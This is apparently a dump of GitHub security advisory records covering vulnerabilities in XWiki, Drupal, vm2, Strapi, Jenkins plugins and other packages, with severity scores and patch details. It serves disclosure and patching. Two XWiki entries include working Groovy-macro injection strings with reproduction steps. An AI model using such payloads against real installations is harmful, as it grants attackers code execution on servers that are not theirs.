schema_version
stringclasses 1
value | id
stringlengths 19
19
| modified
stringlengths 20
20
| published
stringlengths 20
20
| withdrawn
stringlengths 20
20
⌀ | aliases
stringlengths 2
20
| summary
stringlengths 20
140
| details
stringlengths 56
37.2k
| severity
stringlengths 2
92
| affected
stringlengths 88
7.07k
| references
stringlengths 139
4.72k
| database_specific
stringlengths 131
185
|
---|---|---|---|---|---|---|---|---|---|---|---|
1.4.0
|
GHSA-vrr8-fp7c-7qgp
|
2023-04-18T14:35:21Z
|
2023-04-12T20:36:51Z
| null |
['CVE-2023-30537']
|
org.xwiki.platform:xwiki-platform-flamingo-theme-ui vulnerable to privilege escalation
|
### Impact
Any user with the right to add an object on a page can execute arbitrary Groovy, Python or Velocity code in XWiki leading to full access to the XWiki installation. The root cause is improper escaping of the styles properties `FlamingoThemesCode.WebHome`. This page is installed by default.
#### Reproduction Steps
**Steps to reproduce**:
- As a user without script or programming rights, edit your user profile with the object editor (enable advanced mode if necessary to get access) and add an object of type "Theme Class" of "FlamingoThemesCode". In the field "body-bg" (all other fields should work, too) add the following text:
`{{/html}} {{async async="true" cached="false" context="doc.reference"}}{{groovy}}println("Hello " + "from groovy!"){{/groovy}}{{/async}}`
- Click "Save & View"
- Open <xwiki-host>/xwiki/bin/view/FlamingoThemesCode/WebHomeSheet where <xwiki-host> is the URL of your XWiki installation
**Expected result**:
The list of color themes either doesn't include the user's profile or displays a regular preview.
**Actual result**:
The user's profile is listed as color theme but instead of the little preview the message
```
Failed to execute the [html] macro. Cause: [When using HTML content inline, you can only use inline HTML content. Block HTML content (such as tables) cannot be displayed. Try leaving an empty line before and after the macro.]. Click on this message for details.
Hello from groovy!">
```
is displayed. This shows that a Groovy macro with content created by the user has been executed and thus demonstrates a privilege escalation from simple user account to programming rights.
### Patches
The vulnerability has been patched in XWiki 13.10.11, 14.4.7 and 14.10.
### Workarounds
The issue can be fixed by applying this [patch](https://github.com/xwiki/xwiki-platform/commit/df596f15368342236f8899ca122af8f3df0fe2e8#diff-e2153fa59f9d92ef67b0afbf27984bd17170921a3b558fac227160003d0dfd2a) on `FlamingoThemesCode.WebHomeSheet`.
### References
- patch: https://github.com/xwiki/xwiki-platform/commit/df596f15368342236f8899ca122af8f3df0fe2e8
- Jira: https://jira.xwiki.org/browse/XWIKI-20280
### For more information
If you have any questions or comments about this advisory:
* Open an issue in [Jira XWiki.org](https://jira.xwiki.org/)
* Email us at [Security Mailing List](mailto:[email protected])
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:L'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-flamingo-theme-ui'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '12.6.6'}, {'fixed': '13.10.11'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-flamingo-theme-ui'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '14.0-rc-1'}, {'fixed': '14.4.7'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-flamingo-theme-ui'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '14.5'}, {'fixed': '14.10'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-vrr8-fp7c-7qgp'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-30537'}, {'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/commit/df596f15368342236f8899ca122af8f3df0fe2e8'}, {'type': 'PACKAGE', 'url': 'https://github.com/xwiki/xwiki-platform'}, {'type': 'WEB', 'url': 'https://jira.xwiki.org/browse/XWIKI-20280'}]
|
{'cwe_ids': ['CWE-94', 'CWE-95'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-04-12T20:36:51Z', 'nvd_published_at': '2023-04-16T08:15:00Z'}
|
1.4.0
|
GHSA-cfh2-7f6h-3m85
|
2023-05-09T16:24:39Z
|
2023-04-24T20:30:38Z
| null |
['CVE-2022-25278']
|
Access bypass in Drupal Core
|
Drupal core form API evaluates form element access incorrectly. This can lead to a user being able to alter data they should not have access to.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'drupal/core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.0.0'}, {'fixed': '9.3.19'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'drupal/core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.4.0'}, {'fixed': '9.4.3'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-25278'}, {'type': 'WEB', 'url': 'https://github.com/FriendsOfPHP/security-advisories/blob/master/drupal/core/CVE-2022-25278.yaml'}, {'type': 'PACKAGE', 'url': 'https://github.com/drupal/core'}, {'type': 'WEB', 'url': 'https://www.drupal.org/sa-core-2022-013'}]
|
{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-04-24T20:30:38Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-f55r-8rcv-mqcf
|
2023-05-05T20:33:58Z
|
2023-04-28T15:30:18Z
| null |
['CVE-2023-28472']
|
Missing secure cookie parameters
|
Concrete CMS (previously concrete5) before 9.2 does not have Secure and HTTP only attributes set for ccmPoll cookies.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'concrete5/concrete5'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '9.2.0'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-28472'}, {'type': 'WEB', 'url': 'https://concretecms.com'}, {'type': 'WEB', 'url': 'https://www.concretecms.org/about/project-news/security/concrete-cms-security-advisory-2023-04-20'}]
|
{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-04-28T20:40:05Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-7jxr-cg7f-gpgv
|
2023-04-07T20:35:03Z
|
2023-04-07T20:35:03Z
| null |
['CVE-2023-29017']
|
vm2 vulnerable to sandbox escape
|
vm2 was not properly handling host objects passed to `Error.prepareStackTrace` in case of unhandled async errors.
- vm2 version: ~3.9.14
- Node version: 18.15.0, 19.8.1, 17.9.1
### Impact
A threat actor can bypass the sandbox protections to gain remote code execution rights on the host running the sandbox.
### Patches
This vulnerability was patched in the release of version `3.9.15` of `vm2`.
### Workarounds
None.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'npm', 'name': 'vm2'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.9.15'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/patriksimek/vm2/security/advisories/GHSA-7jxr-cg7f-gpgv'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-29017'}, {'type': 'WEB', 'url': 'https://github.com/patriksimek/vm2/issues/515'}, {'type': 'WEB', 'url': 'https://github.com/patriksimek/vm2/commit/d534e5785f38307b70d3aac1945260a261a94d50'}, {'type': 'WEB', 'url': 'https://gist.github.com/seongil-wi/2a44e082001b959bfe304b62121fb76d'}, {'type': 'PACKAGE', 'url': 'https://github.com/patriksimek/vm2'}]
|
{'cwe_ids': ['CWE-913'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-04-07T20:35:03Z', 'nvd_published_at': '2023-04-06T20:15:00Z'}
|
1.4.0
|
GHSA-w6q2-48ch-fj26
|
2023-04-14T20:30:43Z
|
2023-04-10T15:30:26Z
| null |
['CVE-2023-25392']
|
Allegro Tech BigFlow vulnerable to Missing SSL Certificate Validation
|
Allegro Tech BigFlow prior to 1.6.0 is vulnerable to Missing SSL Certificate Validation.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N'}]
|
[{'package': {'ecosystem': 'PyPI', 'name': 'bigflow'}, 'ecosystem_specific': {'affected_functions': ['bigflow.build.operate._build_docker_image', 'bigflow.deploy.deploy_docker_image', 'bigflow.deploy._deploy_docker_image_from_local_repo', 'bigflow.deploy._deploy_docker_image_from_fs', 'bigflow.deploy._deploy_image_loaded_to_local_registry', 'bigflow.deploy.authenticate_to_registry', 'bigflow.deploy.check_images_exist', 'bigflow.deploy.deploy_dags_folder', 'bigflow.deploy.create_storage_client', 'bigflow.deploy.get_vault_token']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.6.0'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-25392'}, {'type': 'WEB', 'url': 'https://github.com/allegro/bigflow/pull/357'}, {'type': 'WEB', 'url': 'https://github.com/allegro/bigflow/commit/4ce197ff99bd38693dea59ab5e9b781fbcef4276'}, {'type': 'WEB', 'url': 'https://github.com/allegro/bigflow/commit/7e956661f76907594e8c82e8fb0af76dbea2a0fc'}, {'type': 'PACKAGE', 'url': 'https://github.com/allegro/bigflow'}, {'type': 'WEB', 'url': 'https://lutrasecurity.com/en/articles/cve-2023-25392/'}]
|
{'cwe_ids': ['CWE-295'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-04-10T21:04:11Z', 'nvd_published_at': '2023-04-10T14:15:00Z'}
|
1.4.0
|
GHSA-r6xq-xcxc-fghx
|
2023-05-02T18:53:46Z
|
2023-04-22T03:30:18Z
| null |
['CVE-2023-2240']
|
Improper Privilege Management in microweber
|
Microweber prior to 1.3.4 has an Improper Privilege Management vulnerability.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'microweber/microweber'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.3.4'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-2240'}, {'type': 'WEB', 'url': 'https://github.com/microweber/microweber/commit/f43d5b767ad5814fc5f84bbaf0b77996262f3a4b'}, {'type': 'PACKAGE', 'url': 'https://github.com/microweber/microweber'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/8f595559-7b4b-4b00-954c-7a627766e203'}]
|
{'cwe_ids': ['CWE-269'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-04-24T17:05:37Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-67mg-gm8m-ph5r
|
2023-05-03T16:03:27Z
|
2023-04-21T15:30:18Z
| null |
['CVE-2023-2227']
|
Improper Authorization in modoboa
|
In modoboa prior to 2.1.0, sending a GET request to the endpoint `/api/v2/parameters/core/` returns sensitive information without any authentication or authorization.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}]
|
[{'package': {'ecosystem': 'PyPI', 'name': 'modoboa'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.0'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-2227'}, {'type': 'WEB', 'url': 'https://github.com/modoboa/modoboa/commit/7bcd3f6eb264d4e3e01071c97c2bac51cdd6fe97'}, {'type': 'PACKAGE', 'url': 'https://github.com/modoboa/modoboa'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/351f9055-2008-4af0-b820-01ff66678bf3'}]
|
{'cwe_ids': ['CWE-285'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-04-24T20:23:45Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-qx9h-c5v6-ghqh
|
2023-04-26T20:33:30Z
|
2023-04-12T20:35:50Z
| null |
['CVE-2023-29214']
|
org.xwiki.platform:xwiki-platform-panels-ui Eval Injection vulnerability
|
### Impact
Any user with edit rights can execute arbitrary Groovy, Python or Velocity code in XWiki leading to full access to the XWiki installation. The root cause is improper escaping of the included pages in the IncludedDocuments panel.
**Precondition**: As an admin, add the `Panels.IncludedDocuments` panel on one column.
A proof of concept exploit is to edit a document and add the following code before saving.
```
{{display reference="{{cache~}~}{{groovy~}~}println(~"Hello from Groovy~" + ~" in included document!~"){{/groovy~}~}{{/cache~}~}"/}}
```
**expected**
The right had side panels contain:
```
One included page:
{{cache}}{{groovy}}println("Hello from Groovy" + " in included document!"){{/groovy}}{{/cache}}
```
**actual**
The right had side panels contain:
```
One included page:
XWiki.Hello from Groovy in included document!
```
### Patches
The problem has been patched on XWiki 14.4.7, and 14.10.
### Workarounds
The issue can be fixed manually applying this [patch](https://github.com/xwiki/xwiki-platform/commit/50b4d91418b4150933f0317eb4a94ceaf5b69f67).
### References
- https://github.com/xwiki/xwiki-platform/commit/50b4d91418b4150933f0317eb4a94ceaf5b69f67
- https://jira.xwiki.org/browse/XWIKI-20306
### For more information
If you have any questions or comments about this advisory:
* Open an issue in [Jira XWiki.org](https://jira.xwiki.org/)
* Email us at [Security Mailing List](mailto:[email protected])
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-panels-ui'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.1-M2'}, {'fixed': '13.10.11'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-panels-ui'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '14.0-rc-1'}, {'fixed': '14.4.7'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-panels-ui'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '14.5'}, {'fixed': '14.10'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-qx9h-c5v6-ghqh'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-29214'}, {'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/commit/50b4d91418b4150933f0317eb4a94ceaf5b69f67'}, {'type': 'PACKAGE', 'url': 'https://github.com/xwiki/xwiki-platform'}, {'type': 'WEB', 'url': 'https://jira.xwiki.org/browse/XWIKI-20306'}]
|
{'cwe_ids': ['CWE-94', 'CWE-95'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-04-12T20:35:50Z', 'nvd_published_at': '2023-04-16T07:15:00Z'}
|
1.4.0
|
GHSA-h7vv-46p5-prmh
|
2023-04-05T21:28:05Z
|
2023-04-05T18:30:18Z
| null |
['CVE-2023-1788']
|
Firefly III insufficiently expires sessions
|
Firefly III prior to 6.0.0 insufficiently expires sessions upon close.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'grumpydictator/firefly-iii'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.0.0'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-1788'}, {'type': 'WEB', 'url': 'https://github.com/firefly-iii/firefly-iii/commit/68f398f97cbe1870fc098d8460bf903b9c3fab30'}, {'type': 'PACKAGE', 'url': 'https://github.com/firefly-iii/firefly-iii/'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/79323c9e-e0e5-48ef-bd19-d0b09587ccb2'}]
|
{'cwe_ids': ['CWE-613'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-04-05T21:28:05Z', 'nvd_published_at': '2023-04-05T16:15:00Z'}
|
1.4.0
|
GHSA-93h6-wx7r-mgfp
|
2023-05-05T20:33:56Z
|
2023-04-27T03:30:23Z
| null |
['CVE-2023-31285']
|
Cross Site Scripting (XSS) in Serenity
|
An XSS issue was discovered in Serenity Serene (and StartSharp) before 6.7.0. When users upload temporary files, some specific file endings are not allowed, but it is possible to upload .html or .htm files containing an XSS payload. The resulting link can be sent to an administrator user.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]
|
[{'package': {'ecosystem': 'NuGet', 'name': 'Serenity.Net.Core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.7.0'}]}]}, {'package': {'ecosystem': 'NuGet', 'name': 'Serenity.Net.Services'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.7.0'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-31285'}, {'type': 'WEB', 'url': 'https://github.com/serenity-is/Serenity/commit/11b9d267f840513d04b4f4d4876de7823a6e48d2'}, {'type': 'WEB', 'url': 'https://github.com/serenity-is/Serenity/commit/f54e9bfcf8ceb7f26f81a7362349bc1f63251d92'}, {'type': 'WEB', 'url': 'https://github.com/serenity-is/serene/commit/6dce8162f4382badd429a9f0f1470acb64e8c4fd'}, {'type': 'PACKAGE', 'url': 'https://github.com/serenity-is/Serenity'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/172648/Serenity-StartSharp-Software-File-Upload-XSS-User-Enumeration-Reusable-Tokens.html'}, {'type': 'WEB', 'url': 'http://seclists.org/fulldisclosure/2023/May/14'}]
|
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-04-27T17:07:49Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-pvjv-386f-c8wh
|
2023-04-28T19:56:41Z
|
2023-04-17T09:30:24Z
| null |
['CVE-2023-24831']
|
Apache IoTDB Grafana Connector vulnerable to Improper Authentication
|
Improper Authentication vulnerability in Apache Software Foundation Apache IoTDB. This issue affects Apache IoTDB Grafana Connector from 0.13.0 through 0.13.3.
Attackers could log in without authorization. This is fixed in 0.13.4.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.iotdb:iotdb-grafana-connector'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.13.0'}, {'fixed': '0.13.4'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-24831'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/iotdb'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/3dgvzgstycf8b5hyf4z3n7cqdhcyln3l'}]
|
{'cwe_ids': ['CWE-287'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-04-21T20:28:03Z', 'nvd_published_at': '2023-04-17T07:15:00Z'}
|
1.4.0
|
GHSA-54cw-rvr3-w6cx
|
2023-04-12T20:43:41Z
|
2023-04-12T18:30:35Z
| null |
['CVE-2023-30531']
|
Jenkins Consul KV Builder Plugin stores HashiCorp Consul ACL Token unencrypted
|
Jenkins Consul KV Builder Plugin 2.0.13 and earlier stores the HashiCorp Consul ACL Token unencrypted in its global configuration file `org.jenkinsci.plugins.consulkv.GlobalConsulConfig.xml` on the Jenkins controller as part of its configuration.
This token can be viewed by users with access to the Jenkins controller file system.
Additionally, the global configuration form does not mask the token, increasing the potential for attackers to observe and capture it.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:consul-kv-builder'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.0.13'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-30531'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-04-12/#SECURITY-2944'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/04/13/3'}]
|
{'cwe_ids': ['CWE-312'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-04-12T20:43:41Z', 'nvd_published_at': '2023-04-12T18:15:00Z'}
|
1.4.0
|
GHSA-4wfq-jc9h-vpcx
|
2023-05-05T21:40:14Z
|
2023-04-26T15:30:21Z
| null |
['CVE-2022-25276']
|
Lack of domain validation in Druple core
|
The Media oEmbed iframe route does not properly validate the iframe domain setting, which allows embeds to be displayed in the context of the primary domain. Under certain circumstances, this could lead to cross-site scripting, leaked cookies, or other vulnerabilities.
Drupal 7 core does not include the Media module and therefore is not affected.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'drupal/core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.0.0'}, {'fixed': '9.3.19'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'drupal/core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.4.0'}, {'fixed': '9.4.3'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-25276'}, {'type': 'PACKAGE', 'url': 'https://github.com/drupal/core'}, {'type': 'WEB', 'url': 'https://www.drupal.org/sa-core-2022-015'}]
|
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-04-26T19:14:03Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-v27q-87jf-j9cr
|
2023-04-07T23:03:42Z
|
2023-04-02T21:30:17Z
| null |
['CVE-2023-28670']
|
Jenkins Pipeline Aggregator View Plugin vulnerable to Cross-site Scripting
|
Jenkins Pipeline Aggregator View Plugin 1.13 and earlier does not escape a variable representing the current view's URL in inline JavaScript, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by authenticated attackers with Overall/Read permission. Version 1.14 obtains the current URL in a way not susceptible to XSS.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'com.paul8620.jenkins.plugins:pipeline-aggregator-view'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.14'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-28670'}, {'type': 'PACKAGE', 'url': 'https://github.com/jenkinsci/pipeline-aggregator-view-plugin'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-03-21/#SECURITY-2885'}]
|
{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-04-03T22:55:07Z', 'nvd_published_at': '2023-04-02T21:15:00Z'}
|
1.4.0
|
GHSA-m8q9-7v2f-qjx9
|
2023-04-06T15:07:13Z
|
2023-04-05T18:30:18Z
| null |
['CVE-2023-1880']
|
thorsten/phpmyfaq vulnerable to stored cross-site scripting (XSS) via artlang parameter
|
thorsten/phpmyfaq prior to 3.1.12 is vulnerable to stored cross-site scripting (XSS) because it fails to sanitize user input in the artlang parameter. This has been fixed in 3.1.12.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:L'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'thorsten/phpmyfaq'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.1.12'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-1880'}, {'type': 'WEB', 'url': 'https://github.com/thorsten/phpmyfaq/commit/bbc5d4aa4a4375c14e34dd9fcad2042066fe476d'}, {'type': 'PACKAGE', 'url': 'https://github.com/thorsten/phpMyFAQ'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/ece5f051-674e-4919-b998-594714910f9e'}]
|
{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-04-06T15:07:13Z', 'nvd_published_at': '2023-04-05T17:15:00Z'}
|
1.4.0
|
GHSA-2h87-4q2w-v4hf
|
2023-05-01T18:34:55Z
|
2023-04-19T21:41:30Z
| null |
['CVE-2023-22621']
|
Strapi plugins vulnerable to Server-Side Template Injection and Remote Code Execution in the Users-Permissions Plugin
|
### Summary
Strapi through 4.5.5 allows authenticated Server-Side Template Injection (SSTI) that can be exploited to execute arbitrary code on the server.
### Details
Strapi through 4.5.5 allows authenticated Server-Side Template Injection (SSTI) that can be exploited to execute arbitrary code on the server. A remote attacker with access to the Strapi admin panel can inject a crafted payload that executes code on the server into an email template that bypasses the validation checks that should prevent code execution.
### IoC
Using just the request log files, the only IoC to search for is a `PUT` request to URL path `/users-permissions/email-templates`. This IoC only indicates that a Strapi email template was modified on your server and by itself does not indicate if your Strapi server has been compromised. If this IoC is detected, you will need to manually review your email templates on your Strapi server and backups of your database to see if any of the templates contain a `lodash` template delimiter (eg. `<%STUFF HERE%>`) that contains suspicious JavaScript code. Generally speaking these templates should look like the following, you may have minor adjustments but any unrecognized code should be considered suspicious.
Reset Password Template:
```html
<p>We heard that you lost your password. Sorry about that!</p>
<p>But don’t worry! You can use the following link to reset your password:</p>
<p><%= URL %>?code=<%= TOKEN %></p>
<p>Thanks.</p>
```
Email Confirmation Template:
```html
<p>Thank you for registering!</p>
<p>You have to confirm your email address. Please click on the link below.</p>
<p><%= URL %>?confirmation=<%= CODE %></p>
<p>Thanks.</p>
```
Specifically you should look for odd code contained within the `<%STUFF HERE%>` blocks as this is what is used to bypass the lodash templating system. If you find any code that is not a variable name, or a variable name that is not defined in the template you are most likely impacted and should take immediate steps to confirm there are no malicious applications running on your servers.
### Impact
All users on Strapi below 4.5.6 with access to the admin panel and the ability to modify the email templates
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'npm', 'name': '@strapi/plugin-users-permissions'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.5.6'}]}]}, {'package': {'ecosystem': 'npm', 'name': '@strapi/plugin-email'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.5.6'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/strapi/strapi/security/advisories/GHSA-2h87-4q2w-v4hf'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-22621'}, {'type': 'WEB', 'url': 'https://github.com/strapi/strapi/pull/15385'}, {'type': 'WEB', 'url': 'https://github.com/strapi/strapi/commit/921d30961d6ba96cc098f2aea197350a49f990bd'}, {'type': 'PACKAGE', 'url': 'https://github.com/strapi/strapi'}, {'type': 'WEB', 'url': 'https://github.com/strapi/strapi/releases'}, {'type': 'WEB', 'url': 'https://github.com/strapi/strapi/releases/tag/v4.5.6'}, {'type': 'WEB', 'url': 'https://strapi.io/blog/security-disclosure-of-vulnerabilities-cve'}, {'type': 'WEB', 'url': 'https://www.ghostccamm.com/blog/multi_strapi_vulns/'}]
|
{'cwe_ids': ['CWE-74'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-04-19T21:41:30Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-rg3q-prf8-qxmp
|
2023-04-25T16:34:43Z
|
2023-04-24T22:32:32Z
| null |
['CVE-2023-30623']
|
Arbitrary command injection in embano1/wip
|
## Summary
The `embano1/wip` action uses the `github.event.pull_request.title` parameter in an insecure way. The title parameter is used in a run statement - resulting in a command injection vulnerability due to string interpolation.
## Details and Impact
This vulnerability can be triggered by any user on GitHub. They just need to create a pull request with a commit message containing an exploit. (Note that first-time PR requests will not be run - but the attacker can submit a valid PR before submitting an invalid PR). The commit can be genuine, but the commit message can be malicious.
This can be used to execute code on the GitHub runners (potentially use it for crypto-mining, and waste your resources) and can be used to exfiltrate any secrets that you use in the CI pipeline (including repository tokens). [Here](https://securitylab.github.com/research/github-actions-untrusted-input/) is a set of blog posts by Github's security team explaining this issue.
## How to update existing workflows
Replace the following line in your workflow using this action with the `v2` branch name or commit pointing to this branch:
```yaml
uses: embano1/wip@v2
```
Or using the exact commit:
```yaml
uses: embano1/wip@c25450f77ed02c20d00b76ee3b33ff43838739a2 # v2
```
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]
|
